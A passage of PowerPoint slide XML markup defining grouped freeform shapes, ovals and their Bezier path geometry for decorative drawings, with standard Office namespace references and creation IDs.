                  <a:cubicBezTo>
                    <a:pt x="118" y="227"/>
                    <a:pt x="174" y="133"/>
                    <a:pt x="176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6" name="Oval 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78AD15A3-1789-454B-A341-C0C4085D616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588421" flipH="1" flipV="1">
              <a:off x="10156596" y="2992219"/>
              <a:ext cx="308669" cy="305837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1C0552D0-40D2-4EDB-A3AB-A8F2082BCF06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3049414" y="2549041"/>
              <a:ext cx="1482221" cy="1396254"/>
              <a:chOff x="10008697" y="-1027479"/>
              <a:chExt cx="1482221" cy="1396254"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="137" name="Freeform 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF584F51-17FD-48B8-A7FF-A76C0963E64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 flipH="1" flipV="1">
                <a:off x="10008697" y="-842504"/>
                <a:ext cx="626317" cy="888722"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 227 w 244"/>
                  <a:gd name="T1" fmla="*/ 217 h 346"/>
                  <a:gd name="T2" fmla="*/ 180 w 244"/>
                  <a:gd name="T3" fmla="*/ 125 h 346"/>
                  <a:gd name="T4" fmla="*/ 193 w 244"/>
                  <a:gd name="T5" fmla="*/ 83 h 346"/>
                  <a:gd name="T6" fmla="*/ 193 w 244"/>
                  <a:gd name="T7" fmla="*/ 77 h 346"/>
                  <a:gd name="T8" fmla="*/ 200 w 244"/>
                  <a:gd name="T9" fmla="*/ 7 h 346"/>
                  <a:gd name="T10" fmla="*/ 154 w 244"/>
                  <a:gd name="T11" fmla="*/ 19 h 346"/>
                  <a:gd name="T12" fmla="*/ 122 w 244"/>
                  <a:gd name="T13" fmla="*/ 12 h 346"/>
                  <a:gd name="T14" fmla="*/ 90 w 244"/>
                  <a:gd name="T15" fmla="*/ 19 h 346"/>
                  <a:gd name="T16" fmla="*/ 45 w 244"/>
                  <a:gd name="T17" fmla="*/ 7 h 346"/>
                  <a:gd name="T18" fmla="*/ 51 w 244"/>
                  <a:gd name="T19" fmla="*/ 77 h 346"/>
                  <a:gd name="T20" fmla="*/ 51 w 244"/>
                  <a:gd name="T21" fmla="*/ 83 h 346"/>
                  <a:gd name="T22" fmla="*/ 54 w 244"/>
                  <a:gd name="T23" fmla="*/ 105 h 346"/>
                  <a:gd name="T24" fmla="*/ 99 w 244"/>
                  <a:gd name="T25" fmla="*/ 172 h 346"/>
                  <a:gd name="T26" fmla="*/ 103 w 244"/>
                  <a:gd name="T27" fmla="*/ 336 h 346"/>
                  <a:gd name="T28" fmla="*/ 99 w 244"/>
                  <a:gd name="T29" fmla="*/ 344 h 346"/>
                  <a:gd name="T30" fmla="*/ 137 w 244"/>
                  <a:gd name="T31" fmla="*/ 345 h 346"/>
                  <a:gd name="T32" fmla="*/ 227 w 244"/>
                  <a:gd name="T33" fmla="*/ 217 h 346"/>
                  <a:gd name="T34" fmla="*/ 146 w 244"/>
                  <a:gd name="T35" fmla="*/ 58 h 346"/>
                  <a:gd name="T36" fmla="*/ 153 w 244"/>
                  <a:gd name="T37" fmla="*/ 65 h 346"/>
                  <a:gd name="T38" fmla="*/ 146 w 244"/>
                  <a:gd name="T39" fmla="*/ 72 h 346"/>
                  <a:gd name="T40" fmla="*/ 139 w 244"/>
                  <a:gd name="T41" fmla="*/ 65 h 346"/>
                  <a:gd name="T42" fmla="*/ 146 w 244"/>
                  <a:gd name="T43" fmla="*/ 58 h 346"/>
                  <a:gd name="T44" fmla="*/ 103 w 244"/>
                  <a:gd name="T45" fmla="*/ 65 h 346"/>
                  <a:gd name="T46" fmla="*/ 97 w 244"/>
                  <a:gd name="T47" fmla="*/ 72 h 346"/>
                  <a:gd name="T48" fmla="*/ 90 w 244"/>
                  <a:gd name="T49" fmla="*/ 65 h 346"/>
                  <a:gd name="T50" fmla="*/ 97 w 244"/>
                  <a:gd name="T51" fmla="*/ 58 h 346"/>
                  <a:gd name="T52" fmla="*/ 103 w 244"/>
                  <a:gd name="T53" fmla="*/ 65 h 346"/>
                  <a:gd name="T54" fmla="*/ 107 w 244"/>
                  <a:gd name="T55" fmla="*/ 93 h 346"/>
                  <a:gd name="T56" fmla="*/ 122 w 244"/>
                  <a:gd name="T57" fmla="*/ 78 h 346"/>
                  <a:gd name="T58" fmla="*/ 138 w 244"/>
                  <a:gd name="T59" fmla="*/ 93 h 346"/>
                  <a:gd name="T60" fmla="*/ 122 w 244"/>
                  <a:gd name="T61" fmla="*/ 117 h 346"/>
                  <a:gd name="T62" fmla="*/ 107 w 244"/>
                  <a:gd name="T63" fmla="*/ 93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4" h="346">
                    <a:moveTo>
                      <a:pt x="227" y="217"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="175"/>
                      <a:pt x="207" y="143"/>
                      <a:pt x="180" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="113"/>
                      <a:pt x="193" y="99"/>
                      <a:pt x="193" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="81"/>
                      <a:pt x="193" y="79"/>
                      <a:pt x="193" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="61"/>
                      <a:pt x="229" y="17"/>
                      <a:pt x="200" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="0"/>
                      <a:pt x="161" y="12"/>
                      <a:pt x="154" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="14"/>
                      <a:pt x="133" y="12"/>
                      <a:pt x="122" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="12"/>
                      <a:pt x="100" y="14"/>
                      <a:pt x="90" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="12"/>
                      <a:pt x="66" y="0"/>
                      <a:pt x="45" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="17"/>
                      <a:pt x="0" y="61"/>
                      <a:pt x="51" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="79"/>
                      <a:pt x="51" y="81"/>
                      <a:pt x="51" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="91"/>
                      <a:pt x="52" y="98"/>
                      <a:pt x="54" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="124"/>
                      <a:pt x="87" y="147"/>
                      <a:pt x="99" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="212"/>
                      <a:pt x="135" y="273"/>
                      <a:pt x="103" y="336"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="339"/>
                      <a:pt x="100" y="341"/>
                      <a:pt x="99" y="344"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="346"/>
                      <a:pt x="126" y="346"/>
                      <a:pt x="137" y="345"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="213" y="340"/>
                      <a:pt x="231" y="275"/>
                      <a:pt x="227" y="217"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="146" y="58"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="58"/>
                      <a:pt x="153" y="61"/>
                      <a:pt x="153" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="69"/>
                      <a:pt x="150" y="72"/>
                      <a:pt x="146" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="72"/>
                      <a:pt x="139" y="69"/>
                      <a:pt x="139" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="61"/>
                      <a:pt x="142" y="58"/>
                      <a:pt x="146" y="58"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="103" y="65"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="69"/>
                      <a:pt x="100" y="72"/>
                      <a:pt x="97" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="72"/>
                      <a:pt x="90" y="69"/>
                      <a:pt x="90" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="61"/>
                      <a:pt x="93" y="58"/>
                      <a:pt x="97" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="58"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="103" y="65"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="107" y="93"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="76"/>
                      <a:pt x="122" y="78"/>
                      <a:pt x="122" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="78"/>
                      <a:pt x="131" y="76"/>
                      <a:pt x="138" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="113"/>
                      <a:pt x="135" y="117"/>
                      <a:pt x="122" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="117"/>
                      <a:pt x="99" y="112"/>
                      <a:pt x="107" y="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8" name="Freeform 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC3F9765-39F7-4208-9D3E-0C3079EEBB44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 flipH="1" flipV="1">
                <a:off x="10377586" y="-1027479"/>
                <a:ext cx="1113332" cy="1396254"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 165 w 434"/>
                  <a:gd name="T1" fmla="*/ 244 h 544"/>
                  <a:gd name="T2" fmla="*/ 64 w 434"/>
                  <a:gd name="T3" fmla="*/ 333 h 544"/>
                  <a:gd name="T4" fmla="*/ 84 w 434"/>
                  <a:gd name="T5" fmla="*/ 380 h 544"/>
                  <a:gd name="T6" fmla="*/ 195 w 434"/>
                  <a:gd name="T7" fmla="*/ 346 h 544"/>
                  <a:gd name="T8" fmla="*/ 233 w 434"/>
                  <a:gd name="T9" fmla="*/ 435 h 544"/>
                  <a:gd name="T10" fmla="*/ 132 w 434"/>
                  <a:gd name="T11" fmla="*/ 489 h 544"/>
                  <a:gd name="T12" fmla="*/ 154 w 434"/>
                  <a:gd name="T13" fmla="*/ 539 h 544"/>
                  <a:gd name="T14" fmla="*/ 404 w 434"/>
                  <a:gd name="T15" fmla="*/ 457 h 544"/>
                  <a:gd name="T16" fmla="*/ 401 w 434"/>
                  <a:gd name="T17" fmla="*/ 303 h 544"/>
                  <a:gd name="T18" fmla="*/ 294 w 434"/>
                  <a:gd name="T19" fmla="*/ 191 h 544"/>
                  <a:gd name="T20" fmla="*/ 300 w 434"/>
                  <a:gd name="T21" fmla="*/ 180 h 544"/>
                  <a:gd name="T22" fmla="*/ 309 w 434"/>
                  <a:gd name="T23" fmla="*/ 134 h 544"/>
                  <a:gd name="T24" fmla="*/ 309 w 434"/>
                  <a:gd name="T25" fmla="*/ 124 h 544"/>
                  <a:gd name="T26" fmla="*/ 319 w 434"/>
                  <a:gd name="T27" fmla="*/ 12 h 544"/>
                  <a:gd name="T28" fmla="*/ 246 w 434"/>
                  <a:gd name="T29" fmla="*/ 31 h 544"/>
                  <a:gd name="T30" fmla="*/ 195 w 434"/>
                  <a:gd name="T31" fmla="*/ 19 h 544"/>
                  <a:gd name="T32" fmla="*/ 144 w 434"/>
                  <a:gd name="T33" fmla="*/ 31 h 544"/>
                  <a:gd name="T34" fmla="*/ 71 w 434"/>
                  <a:gd name="T35" fmla="*/ 12 h 544"/>
                  <a:gd name="T36" fmla="*/ 81 w 434"/>
                  <a:gd name="T37" fmla="*/ 124 h 544"/>
                  <a:gd name="T38" fmla="*/ 81 w 434"/>
                  <a:gd name="T39" fmla="*/ 134 h 544"/>
                  <a:gd name="T40" fmla="*/ 150 w 434"/>
                  <a:gd name="T41" fmla="*/ 239 h 544"/>
                  <a:gd name="T42" fmla="*/ 165 w 434"/>
                  <a:gd name="T43" fmla="*/ 244 h 544"/>
                  <a:gd name="T44" fmla="*/ 248 w 434"/>
                  <a:gd name="T45" fmla="*/ 112 h 544"/>
                  <a:gd name="T46" fmla="*/ 258 w 434"/>
                  <a:gd name="T47" fmla="*/ 123 h 544"/>
                  <a:gd name="T48" fmla="*/ 248 w 434"/>
                  <a:gd name="T49" fmla="*/ 133 h 544"/>
                  <a:gd name="T50" fmla="*/ 237 w 434"/>
                  <a:gd name="T51" fmla="*/ 123 h 544"/>
                  <a:gd name="T52" fmla="*/ 248 w 434"/>
                  <a:gd name="T53" fmla="*/ 112 h 544"/>
                  <a:gd name="T54" fmla="*/ 165 w 434"/>
                  <a:gd name="T55" fmla="*/ 149 h 544"/>
                  <a:gd name="T56" fmla="*/ 194 w 434"/>
                  <a:gd name="T57" fmla="*/ 118 h 544"/>
                  <a:gd name="T58" fmla="*/ 225 w 434"/>
                  <a:gd name="T59" fmla="*/ 149 h 544"/>
                  <a:gd name="T60" fmla="*/ 196 w 434"/>
                  <a:gd name="T61" fmla="*/ 195 h 544"/>
                  <a:gd name="T62" fmla="*/ 165 w 434"/>
                  <a:gd name="T63" fmla="*/ 149 h 544"/>
                  <a:gd name="T64" fmla="*/ 132 w 434"/>
                  <a:gd name="T65" fmla="*/ 123 h 544"/>
                  <a:gd name="T66" fmla="*/ 142 w 434"/>
                  <a:gd name="T67" fmla="*/ 112 h 544"/>
                  <a:gd name="T68" fmla="*/ 153 w 434"/>
                  <a:gd name="T69" fmla="*/ 123 h 544"/>
                  <a:gd name="T70" fmla="*/ 142 w 434"/>
                  <a:gd name="T71" fmla="*/ 133 h 544"/>
                  <a:gd name="T72" fmla="*/ 132 w 434"/>
                  <a:gd name="T73" fmla="*/ 123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4" h="544">
                    <a:moveTo>
                      <a:pt x="165" y="244"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="257"/>
                      <a:pt x="106" y="284"/>
                      <a:pt x="64" y="333"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="380"/>
                      <a:pt x="84" y="380"/>
                      <a:pt x="84" y="380"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="377"/>
                      <a:pt x="195" y="346"/>
                      <a:pt x="195" y="346"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="233" y="435"/>
                      <a:pt x="233" y="435"/>
                      <a:pt x="233" y="435"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="233" y="435"/>
                      <a:pt x="142" y="484"/>
                      <a:pt x="132" y="489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="539"/>
                      <a:pt x="154" y="539"/>
                      <a:pt x="154" y="539"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="541"/>
                      <a:pt x="360" y="544"/>
                      <a:pt x="404" y="457"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="434" y="398"/>
                      <a:pt x="419" y="341"/>
                      <a:pt x="401" y="303"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="374" y="249"/>
                      <a:pt x="328" y="204"/>
                      <a:pt x="294" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="296" y="187"/>
                      <a:pt x="298" y="184"/>
                      <a:pt x="300" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="166"/>
                      <a:pt x="309" y="150"/>
                      <a:pt x="309" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="309" y="131"/>
                      <a:pt x="309" y="127"/>
                      <a:pt x="309" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="390" y="99"/>
                      <a:pt x="366" y="28"/>
                      <a:pt x="319" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="285" y="0"/>
                      <a:pt x="258" y="19"/>
                      <a:pt x="246" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="24"/>
                      <a:pt x="213" y="19"/>
                      <a:pt x="195" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="19"/>
                      <a:pt x="160" y="24"/>
                      <a:pt x="144" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="19"/>
                      <a:pt x="105" y="0"/>
                      <a:pt x="71" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="28"/>
                      <a:pt x="0" y="99"/>
                      <a:pt x="81" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="127"/>
                      <a:pt x="81" y="131"/>
                      <a:pt x="81" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="181"/>
                      <a:pt x="109" y="221"/>
                      <a:pt x="150" y="239"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="241"/>
                      <a:pt x="160" y="243"/>
                      <a:pt x="165" y="244"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="248" y="112"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="112"/>
                      <a:pt x="258" y="117"/>
                      <a:pt x="258" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="258" y="129"/>
                      <a:pt x="254" y="133"/>
                      <a:pt x="248" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242" y="133"/>
                      <a:pt x="237" y="129"/>
                      <a:pt x="237" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="117"/>
                      <a:pt x="242" y="112"/>
                      <a:pt x="248" y="112"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="165" y="149"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="114"/>
                      <a:pt x="194" y="118"/>
                      <a:pt x="194" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="118"/>
                      <a:pt x="212" y="115"/>
                      <a:pt x="225" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="239" y="186"/>
                      <a:pt x="220" y="195"/>
                      <a:pt x="196" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="195"/>
                      <a:pt x="150" y="186"/>
                      <a:pt x="165" y="149"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="132" y="123"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="117"/>
                      <a:pt x="137" y="112"/>
                      <a:pt x="142" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="112"/>
                      <a:pt x="153" y="117"/>
                      <a:pt x="153" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="129"/>
                      <a:pt x="148" y="133"/>
                      <a:pt x="142" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="133"/>
                      <a:pt x="132" y="129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18" name="Freeform 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D788FB9-345A-4743-BB28-44F161872D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3251596" flipH="1" flipV="1">
              <a:off x="4290187" y="6435218"/>
              <a:ext cx="432925" cy="38086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19" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406F8D63-D87C-40B7-A004-9A780C939E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436245">
              <a:off x="8553671" y="6461028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20" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4EEBE0E-F04F-4D59-B039-EF41E5F9E054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20193509">
              <a:off x="6771147" y="5836226"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="135" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17EC1BD-F663-4E02-9758-D587DD1AAC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11D242A4-5A68-4111-AC37-638EDCE9ED1E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8C0E878E-4941-49DA-9AB8-3705699156B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="9341120">
              <a:off x="1821535" y="1348798"/>
              <a:ext cx="1240338" cy="634328"/>
              <a:chOff x="10078074" y="1730681"/>
              <a:chExt cx="695325" cy="355600"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="133" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278D9D2A-4DEF-41B8-B421-F8252BF152F5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0078074" y="1730681"/>
                <a:ext cx="173038" cy="17145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4" name="Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D79B320-55BD-4F59-9CED-9C22610DB0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0160624" y="1765606"/>
                <a:ext cx="612775" cy="320675"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 162"/>
                  <a:gd name="T1" fmla="*/ 5 h 85"/>
                  <a:gd name="T2" fmla="*/ 36 w 162"/>
                  <a:gd name="T3" fmla="*/ 24 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 162"/>
                  <a:gd name="T5" fmla="*/ 85 h 85"/>
                  <a:gd name="T6" fmla="*/ 17 w 162"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 43 w 162"/>
                  <a:gd name="T9" fmla="*/ 61 h 85"/>
                  <a:gd name="T10" fmla="*/ 92 w 162"/>
                  <a:gd name="T11" fmla="*/ 61 h 85"/>
                  <a:gd name="T12" fmla="*/ 125 w 162"/>
                  <a:gd name="T13" fmla="*/ 85 h 85"/>
                  <a:gd name="T14" fmla="*/ 162 w 162"/>
                  <a:gd name="T15" fmla="*/ 85 h 85"/>
                  <a:gd name="T16" fmla="*/ 162 w 162"/>
                  <a:gd name="T17" fmla="*/ 66 h 85"/>
                  <a:gd name="T18" fmla="*/ 129 w 162"/>
                  <a:gd name="T19" fmla="*/ 61 h 85"/>
                  <a:gd name="T20" fmla="*/ 87 w 162"/>
                  <a:gd name="T21" fmla="*/ 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2" h="85">
                    <a:moveTo>
                      <a:pt x="87" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="5"/>
                      <a:pt x="59" y="0"/>
                      <a:pt x="36" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="47"/>
                      <a:pt x="0" y="85"/>
                      <a:pt x="0" y="85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92" y="61"/>
                      <a:pt x="92" y="61"/>
                      <a:pt x="92" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="61"/>
                      <a:pt x="92" y="85"/>
                      <a:pt x="125" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="85"/>
                      <a:pt x="162" y="85"/>
                      <a:pt x="162" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="66"/>
                      <a:pt x="162" y="66"/>
                      <a:pt x="162" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="61"/>
                      <a:pt x="129" y="61"/>
                      <a:pt x="129" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="61"/>
                      <a:pt x="144" y="10"/>
                      <a:pt x="8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22" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D80EEF7-4BF9-4211-A549-8B68724820BA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3493065">
              <a:off x="2804166" y="1725999"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="131" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1785E031-0E45-4F69-944B-900896E2C4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652" y="1429"/>
                <a:ext cx="453" cy="646"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 190"/>
                  <a:gd name="T1" fmla="*/ 101 h 272"/>
                  <a:gd name="T2" fmla="*/ 178 w 190"/>
                  <a:gd name="T3" fmla="*/ 82 h 272"/>
                  <a:gd name="T4" fmla="*/ 96 w 190"/>
                  <a:gd name="T5" fmla="*/ 0 h 272"/>
                  <a:gd name="T6" fmla="*/ 14 w 190"/>
                  <a:gd name="T7" fmla="*/ 82 h 272"/>
                  <a:gd name="T8" fmla="*/ 17 w 190"/>
                  <a:gd name="T9" fmla="*/ 103 h 272"/>
                  <a:gd name="T10" fmla="*/ 0 w 190"/>
                  <a:gd name="T11" fmla="*/ 272 h 272"/>
                  <a:gd name="T12" fmla="*/ 190 w 190"/>
                  <a:gd name="T13" fmla="*/ 272 h 272"/>
                  <a:gd name="T14" fmla="*/ 176 w 190"/>
                  <a:gd name="T15" fmla="*/ 101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272">
                    <a:moveTo>
                      <a:pt x="176" y="101"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="95"/>
                      <a:pt x="178" y="89"/>
                      <a:pt x="178" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="37"/>
                      <a:pt x="141" y="0"/>
                      <a:pt x="96" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="14" y="37"/>
                      <a:pt x="14" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="89"/>
                      <a:pt x="15" y="96"/>
                      <a:pt x="17" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="135"/>
                      <a:pt x="66" y="224"/>
                      <a:pt x="0" y="272"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="272"/>
                      <a:pt x="190" y="272"/>
                      <a:pt x="190" y="272"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="227"/>
                      <a:pt x="174" y="133"/>
                      <a:pt x="176" y="10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2" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C87F338D-BF91-4DD2-A309-9F93CA43E68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2490" y="2075"/>
                <a:ext cx="782" cy="816"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 246 w 328"/>
                  <a:gd name="T1" fmla="*/ 38 h 344"/>
                  <a:gd name="T2" fmla="*/ 301 w 328"/>
                  <a:gd name="T3" fmla="*/ 38 h 344"/>
                  <a:gd name="T4" fmla="*/ 320 w 328"/>
                  <a:gd name="T5" fmla="*/ 19 h 344"/>
                  <a:gd name="T6" fmla="*/ 301 w 328"/>
